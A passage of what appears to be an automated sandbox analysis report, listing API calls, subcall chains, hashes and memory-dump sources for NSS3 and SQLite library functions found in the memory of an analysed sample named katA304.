                                                            • free.MOZGLUE(?), ref: 6CA2AD4F
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                            • String ID:
                                                            • API String ID: 132756963-0
                                                            • Opcode ID: 971eb6e30f5cd2877cbdfa1d936eea9c5eee1266cc5804bed16ef1bafdee9a40
                                                            • Instruction ID: 510f43720fb72736495433947f1da424bbfbd498cc4cb9fe6485dac0d0187f66
                                                            • Opcode Fuzzy Hash: 971eb6e30f5cd2877cbdfa1d936eea9c5eee1266cc5804bed16ef1bafdee9a40
                                                            • Instruction Fuzzy Hash: 8A21C6B1D002248BEF10DF64E9055EE77B5AF05248F494168D808B7600FB35AE99CBA1
                                                            Function 6CA53C80 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • TlsGetValue.KERNEL32 ref: 6CA53C9E
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA53CAE
                                                            • PR_Unlock.NSS3(?), ref: 6CA53CEA
                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CA53D02
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: CriticalEnterErrorSectionUnlockValue
                                                            • String ID:
                                                            • API String ID: 284873373-0
                                                            • Opcode ID: 793e070fb9aa8e29b44a4d27fcba94bb543fcf86d4e5ebaed93e9d1cd61a5e60
                                                            • Instruction ID: 5f487e98c98d9ec79d8f6ca24c5d916d263df845c5d8ccda40d67d2a50182ba2
                                                            • Opcode Fuzzy Hash: 793e070fb9aa8e29b44a4d27fcba94bb543fcf86d4e5ebaed93e9d1cd61a5e60
                                                            • Instruction Fuzzy Hash: BA11D679A012149FD700EF24DC44A9A3778EF49368F598464ED4887711E731ED94CBE0
                                                            Function 6CA5ECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6CA5F0AD,6CA5F150,?,6CA5F150,?,?,?), ref: 6CA5ECBA
                                                              • Part of subcall function 6CA60FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA087ED,00000800,6C9FEF74,00000000), ref: 6CA61000
                                                              • Part of subcall function 6CA60FF0: PR_NewLock.NSS3(?,00000800,6C9FEF74,00000000), ref: 6CA61016
                                                              • Part of subcall function 6CA60FF0: PL_InitArenaPool.NSS3(00000000,security,6CA087ED,00000008,?,00000800,6C9FEF74,00000000), ref: 6CA6102B
                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6CA5ECD1
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA610F3
                                                              • Part of subcall function 6CA610C0: EnterCriticalSection.KERNEL32(?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6110C
                                                              • Part of subcall function 6CA610C0: PL_ArenaAllocate.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61141
                                                              • Part of subcall function 6CA610C0: PR_Unlock.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61182
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6119C
                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6CA5ED02
                                                              • Part of subcall function 6CA610C0: PL_ArenaAllocate.NSS3(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6116E
                                                            • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6CA5ED5A
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                            • String ID:
                                                            • API String ID: 2957673229-0
                                                            • Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                            • Instruction ID: 6fd744f188e85a353ae7fb8769420afd0df3f2af7a64152c9e2a1ed7965227b6
                                                            • Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                            • Instruction Fuzzy Hash: B32184B2A007425BE700CF26D944B62B7E4BFA5348F15C216E81C87A61E774E5E4C6D1
                                                            Function 6CA8EDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6CA77FFA,?,6CA79767,?,8B7874C0,0000A48E), ref: 6CA8EDD4
                                                            • realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6CA77FFA,?,6CA79767,?,8B7874C0,0000A48E), ref: 6CA8EDFD
                                                            • PORT_Alloc_Util.NSS3(?,00000000,00000000,6CA77FFA,?,6CA79767,?,8B7874C0,0000A48E), ref: 6CA8EE14
                                                              • Part of subcall function 6CA60BE0: malloc.MOZGLUE(6CA58D2D,?,00000000,?), ref: 6CA60BF8
                                                              • Part of subcall function 6CA60BE0: TlsGetValue.KERNEL32(6CA58D2D,?,00000000,?), ref: 6CA60C15
                                                            • memcpy.VCRUNTIME140(?,?,6CA79767,00000000,00000000,6CA77FFA,?,6CA79767,?,8B7874C0,0000A48E), ref: 6CA8EE33
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                            • String ID:
                                                            • API String ID: 3903481028-0
                                                            • Opcode ID: 113a2e29b065bc574e155eaa2be2862ac6102891e400aa71c2c28c5262608cd4
                                                            • Instruction ID: 2f2fd4e65c3be496bd6ad0228a4a4838f78b7a06e6510f4d53682956c0a74f75
                                                            • Opcode Fuzzy Hash: 113a2e29b065bc574e155eaa2be2862ac6102891e400aa71c2c28c5262608cd4
                                                            • Instruction Fuzzy Hash: D711A3B9A02706FBE7109E65DC84B46B7A8FF0435DF244531E919C2A00E331E4A887E1
                                                            Function 6CA28DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: CriticalEnterErrorSectionUnlockValue
                                                            • String ID:
                                                            • API String ID: 284873373-0
                                                            • Opcode ID: 6874431c542f1cfd62584150f9453480cac80a27dd66cf22ae56f979655b2b40
                                                            • Instruction ID: 7788d0af56cff3e790814e7aa9a7227bc1ea433b814e8ab707b68242e82faf04
                                                            • Opcode Fuzzy Hash: 6874431c542f1cfd62584150f9453480cac80a27dd66cf22ae56f979655b2b40
                                                            • Instruction Fuzzy Hash: 9D114F75A05A159FD700AF78C5446A9BBF4FF05714F054969EC8897B00E734E894CBD1
                                                            Function 6CAAAC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6CA95F17,?,?,?,?,?,?,?,?,6CA9AAD4), ref: 6CAAAC94
                                                            • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6CA95F17,?,?,?,?,?,?,?,?,6CA9AAD4), ref: 6CAAACA6
                                                            • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6CA9AAD4), ref: 6CAAACC0
                                                            • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6CA9AAD4), ref: 6CAAACDB
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: free$DestroyFreeK11_Monitor
                                                            • String ID:
                                                            • API String ID: 3989322779-0
                                                            • Opcode ID: 5d7a10e947f1570dca33eece311cc852ffd963347acce3d43df6ccd86375ac59
                                                            • Instruction ID: ff735e56e40e9791ad1a1f52996f5c997617a520aca4737e6868327d2edb6bc5
                                                            • Opcode Fuzzy Hash: 5d7a10e947f1570dca33eece311cc852ffd963347acce3d43df6ccd86375ac59
                                                            • Instruction Fuzzy Hash: 8F019EB5601B01ABE750DFA9D908753B7E9BF04659B044839E85AC3E00E731F495CF90
                                                            Function 6CA11DD0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CERT_DestroyCertificate.NSS3(?), ref: 6CA11DFB
                                                              • Part of subcall function 6CA095B0: TlsGetValue.KERNEL32(00000000,?,6CA200D2,00000000), ref: 6CA095D2
                                                              • Part of subcall function 6CA095B0: EnterCriticalSection.KERNEL32(?,?,?,6CA200D2,00000000), ref: 6CA095E7
                                                              • Part of subcall function 6CA095B0: PR_Unlock.NSS3(?,?,?,?,6CA200D2,00000000), ref: 6CA09605
                                                            • PR_EnterMonitor.NSS3 ref: 6CA11E09
                                                              • Part of subcall function 6CAC9090: TlsGetValue.KERNEL32 ref: 6CAC90AB
                                                              • Part of subcall function 6CAC9090: TlsGetValue.KERNEL32 ref: 6CAC90C9
                                                              • Part of subcall function 6CAC9090: EnterCriticalSection.KERNEL32 ref: 6CAC90E5
                                                              • Part of subcall function 6CAC9090: TlsGetValue.KERNEL32 ref: 6CAC9116
                                                              • Part of subcall function 6CAC9090: LeaveCriticalSection.KERNEL32 ref: 6CAC913F
                                                              • Part of subcall function 6CA0E190: PR_EnterMonitor.NSS3(?,?,6CA0E175), ref: 6CA0E19C
                                                              • Part of subcall function 6CA0E190: PR_EnterMonitor.NSS3(6CA0E175), ref: 6CA0E1AA
                                                              • Part of subcall function 6CA0E190: PR_ExitMonitor.NSS3 ref: 6CA0E208
                                                              • Part of subcall function 6CA0E190: PL_HashTableRemove.NSS3(?), ref: 6CA0E219
                                                              • Part of subcall function 6CA0E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CA0E231
                                                              • Part of subcall function 6CA0E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CA0E249
                                                              • Part of subcall function 6CA0E190: PR_ExitMonitor.NSS3 ref: 6CA0E257
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA11E37
                                                            • PR_ExitMonitor.NSS3 ref: 6CA11E4A
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Monitor$Enter$Value$CriticalExitSection$Arena_FreeUtil$CertificateDestroyErrorHashLeaveRemoveTableUnlock
                                                            • String ID:
                                                            • API String ID: 499896158-0
                                                            • Opcode ID: 800d41ba8f5d3a9b7bdc0c484f1cba7ffee47c64dd7b0b1a9b760e57ede799c2
                                                            • Instruction ID: f72e4694e7c05f36da684923a4af1c01d74f8272217e2d2593cd68bbc58776c2
                                                            • Opcode Fuzzy Hash: 800d41ba8f5d3a9b7bdc0c484f1cba7ffee47c64dd7b0b1a9b760e57ede799c2
                                                            • Instruction Fuzzy Hash: D401F771B4815097EB005AA6ED40F727774AB61B4CF140031E61897FD1E731EC98CBD6
                                                            Function 6CA11D50 Relevance: 6.0, APIs: 4, Instructions: 47memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA11D75
                                                            • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6CA11D89
                                                            • PORT_ZAlloc_Util.NSS3(00000010), ref: 6CA11D9C
                                                            • free.MOZGLUE(00000000), ref: 6CA11DB8
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Alloc_Util$Errorfree
                                                            • String ID:
                                                            • API String ID: 939066016-0
                                                            • Opcode ID: 7c396a72df24c689a7289c5c8b68453f3c29bb9c77cf771e794639c3ee532bc5
                                                            • Instruction ID: 664b42d2e2b248db5eb62e3d54d83a2ba8b76157c56f9677b8f1eb2ec9328042
                                                            • Opcode Fuzzy Hash: 7c396a72df24c689a7289c5c8b68453f3c29bb9c77cf771e794639c3ee532bc5
                                                            • Instruction Fuzzy Hash: 12F049B261962057FF101E5AAC41BA73658DFA1B88F150235DF1847F40D620E4C4C2E5
                                                            Function 6CAAAC00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PK11_FreeSymKey.NSS3(?,6CA95D40,00000000,?,?,6CA86AC6,6CA9639C), ref: 6CAAAC2D
                                                              • Part of subcall function 6CA4ADC0: TlsGetValue.KERNEL32(?,6CA2CDBB,?,6CA2D079,00000000,00000001), ref: 6CA4AE10
                                                              • Part of subcall function 6CA4ADC0: EnterCriticalSection.KERNEL32(?,?,6CA2CDBB,?,6CA2D079,00000000,00000001), ref: 6CA4AE24
                                                              • Part of subcall function 6CA4ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CA2D079,00000000,00000001), ref: 6CA4AE5A
                                                              • Part of subcall function 6CA4ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CA2CDBB,?,6CA2D079,00000000,00000001), ref: 6CA4AE6F
                                                              • Part of subcall function 6CA4ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CA2CDBB,?,6CA2D079,00000000,00000001), ref: 6CA4AE7F
                                                              • Part of subcall function 6CA4ADC0: TlsGetValue.KERNEL32(?,6CA2CDBB,?,6CA2D079,00000000,00000001), ref: 6CA4AEB1
                                                              • Part of subcall function 6CA4ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CA2CDBB,?,6CA2D079,00000000,00000001), ref: 6CA4AEC9
                                                            • PK11_FreeSymKey.NSS3(?,6CA95D40,00000000,?,?,6CA86AC6,6CA9639C), ref: 6CAAAC44
                                                            • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6CA95D40,00000000,?,?,6CA86AC6,6CA9639C), ref: 6CAAAC59
                                                            • free.MOZGLUE(8CB6FF01,6CA86AC6,6CA9639C,?,?,?,?,?,?,?,?,?,6CA95D40,00000000,?,6CA9AAD4), ref: 6CAAAC62
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                            • String ID:
                                                            • API String ID: 1595327144-0
                                                            • Opcode ID: 1d6fd07665c6134f787d537ecce0bd6a8e27dafd6a1e1b30f3f5dba625714dd9
                                                            • Instruction ID: f7d1260355342191a60a82e58f460eec3fc030421fef678eab8ff5e35e58ea6b
                                                            • Opcode Fuzzy Hash: 1d6fd07665c6134f787d537ecce0bd6a8e27dafd6a1e1b30f3f5dba625714dd9
                                                            • Instruction Fuzzy Hash: 8C014FB56006049FEB00DF95E9C0B46B7E9AF44759F188068E9498F706D731EC89CFA1
                                                            Function 6CA5FD80 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CA09003,?), ref: 6CA5FD91
                                                              • Part of subcall function 6CA60BE0: malloc.MOZGLUE(6CA58D2D,?,00000000,?), ref: 6CA60BF8
                                                              • Part of subcall function 6CA60BE0: TlsGetValue.KERNEL32(6CA58D2D,?,00000000,?), ref: 6CA60C15
                                                            • PORT_Alloc_Util.NSS3(A4686CA6,?), ref: 6CA5FDA2
                                                            • memcpy.VCRUNTIME140(00000000,12D068C3,A4686CA6,?,?), ref: 6CA5FDC4
                                                            • free.MOZGLUE(00000000,?,?), ref: 6CA5FDD1
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Alloc_Util$Valuefreemallocmemcpy
                                                            • String ID:
                                                            • API String ID: 2335489644-0
                                                            • Opcode ID: d235d507dd32ff6ed98a084240756c08a4d19c81ce2e5e11ab41a53430c27267
                                                            • Instruction ID: b10bd88766d57243caa595f8e4170d9e468b9dc48b70c424e064abd7fb93c4eb
                                                            • Opcode Fuzzy Hash: d235d507dd32ff6ed98a084240756c08a4d19c81ce2e5e11ab41a53430c27267
                                                            • Instruction Fuzzy Hash: BEF0C8B66022425BEB005F55DC809177758EF5529DB58C038ED09CBF02E731D8A4C7E1
                                                            Function 6CB1CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: CriticalDeleteSectionfree
                                                            • String ID:
                                                            • API String ID: 2988086103-0
                                                            • Opcode ID: 816fc2974e2e48c9016438b8d3cad2f4e4541b6f7fc4288691383462aa26691f
                                                            • Instruction ID: 20fcb8fc9a4bff055c81be8a781991de9ceaf27ce8ea3ed5b86bb1c1b1605430
                                                            • Opcode Fuzzy Hash: 816fc2974e2e48c9016438b8d3cad2f4e4541b6f7fc4288691383462aa26691f
                                                            • Instruction Fuzzy Hash: 7EE03076B006089BCA10EFA8DC4488677ACEE4D2707150525E691C3700D231F905CBA1
                                                            Function 6C9F9DC0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 220COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • sqlite3_value_text.NSS3 ref: 6C9F9E1F
                                                              • Part of subcall function 6C9B13C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C982352,?,00000000,?,?), ref: 6C9B1413
                                                              • Part of subcall function 6C9B13C0: memcpy.VCRUNTIME140(00000000,6C982352,00000002,?,?,?,?,6C982352,?,00000000,?,?), ref: 6C9B14C0
                                                            Strings
                                                            • ESCAPE expression must be a single character, xrefs: 6C9F9F78
                                                            • LIKE or GLOB pattern too complex, xrefs: 6C9FA006
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: memcpysqlite3_value_textstrlen
                                                            • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                            • API String ID: 2453365862-264706735
                                                            • Opcode ID: af2b974f302d6c1e2ce874b5d46168a1791915c73ca95cb81fc400fe9c295ee8
                                                            • Instruction ID: 8825ab2f8f8fe284c61f9e02eda7aee5e277a4a21eecabfe34f7cd83d414b5e2
                                                            • Opcode Fuzzy Hash: af2b974f302d6c1e2ce874b5d46168a1791915c73ca95cb81fc400fe9c295ee8
                                                            • Instruction Fuzzy Hash: E7813D30A042518BE700CF39C4803A9B7F6AF8531CF2A8659D8B98BB81D732DC47C791
                                                            Function 6CA54D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CA54D57
                                                            • PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6CA54DE6
